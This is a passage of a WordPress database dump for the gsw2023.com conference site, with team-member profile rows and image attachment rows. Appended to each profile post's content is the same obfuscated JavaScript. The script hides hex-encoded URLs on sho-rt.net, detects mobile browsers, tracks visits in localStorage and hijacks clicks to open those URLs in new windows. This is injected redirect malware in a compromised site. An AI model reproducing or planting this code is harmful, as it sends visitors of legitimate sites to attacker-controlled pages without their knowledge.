Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Ville Lehtola, Netherlands','','publish','closed','closed','','ville-lehtola-netherlands-icwg-i-iv','','','2022-12-06 05:25:40','2022-12-06 05:25:40','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2521',0,'dt_team','',0),
(2522,1,'2022-10-07 18:59:01','2022-10-07 18:59:01','','1','','inherit','open','closed','','1-4','','','2022-10-07 18:59:01','2022-10-07 18:59:01','',2521,'https://gsw2023.com/wp-content/uploads/2022/10/1-3.jpg',0,'attachment','image/jpeg',0),
(2523,1,'2022-10-07 19:00:08','2022-10-07 19:00:08','<!-- wp:paragraph -->\n<p>(WG I/2)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Andrea Masiero, Italy (WG I/2)','','publish','closed','closed','','andrea-masiero-italy-wg-i-2','','','2022-12-06 05:31:25','2022-12-06 05:31:25','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2523',0,'dt_team','',0),
(2524,1,'2022-10-07 18:59:55','2022-10-07 18:59:55','','2','','inherit','open','closed','','2-2','','','2022-10-07 18:59:55','2022-10-07 18:59:55','',2523,'https://gsw2023.com/wp-content/uploads/2022/10/2-1.jpg',0,'attachment','image/jpeg',0),
(2525,1,'2022-10-07 19:00:44','2022-10-07 19:00:44','<!-- wp:paragraph -->\n<p>(ICWG I/IV)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Dorota Iwaszczuk, Germany','','publish','closed','closed','','dorota-iwaszczuk-germany-icwg-i-iv','','','2022-12-06 05:32:19','2022-12-06 05:32:19','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2525',0,'dt_team','',0),
(2526,1,'2022-10-07 19:00:35','2022-10-07 19:00:35','','3','','inherit','open','closed','','3-2','','','2022-10-07 19:00:35','2022-10-07 19:00:35','',2525,'https://gsw2023.com/wp-content/uploads/2022/10/3-1.jpg',0,'attachment','image/jpeg',0),
(2527,1,'2022-10-07 19:02:08','2022-10-07 19:02:08','<!-- wp:paragraph -->\n<p>National Cheng Kung University, Taiwan (WG I/2)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 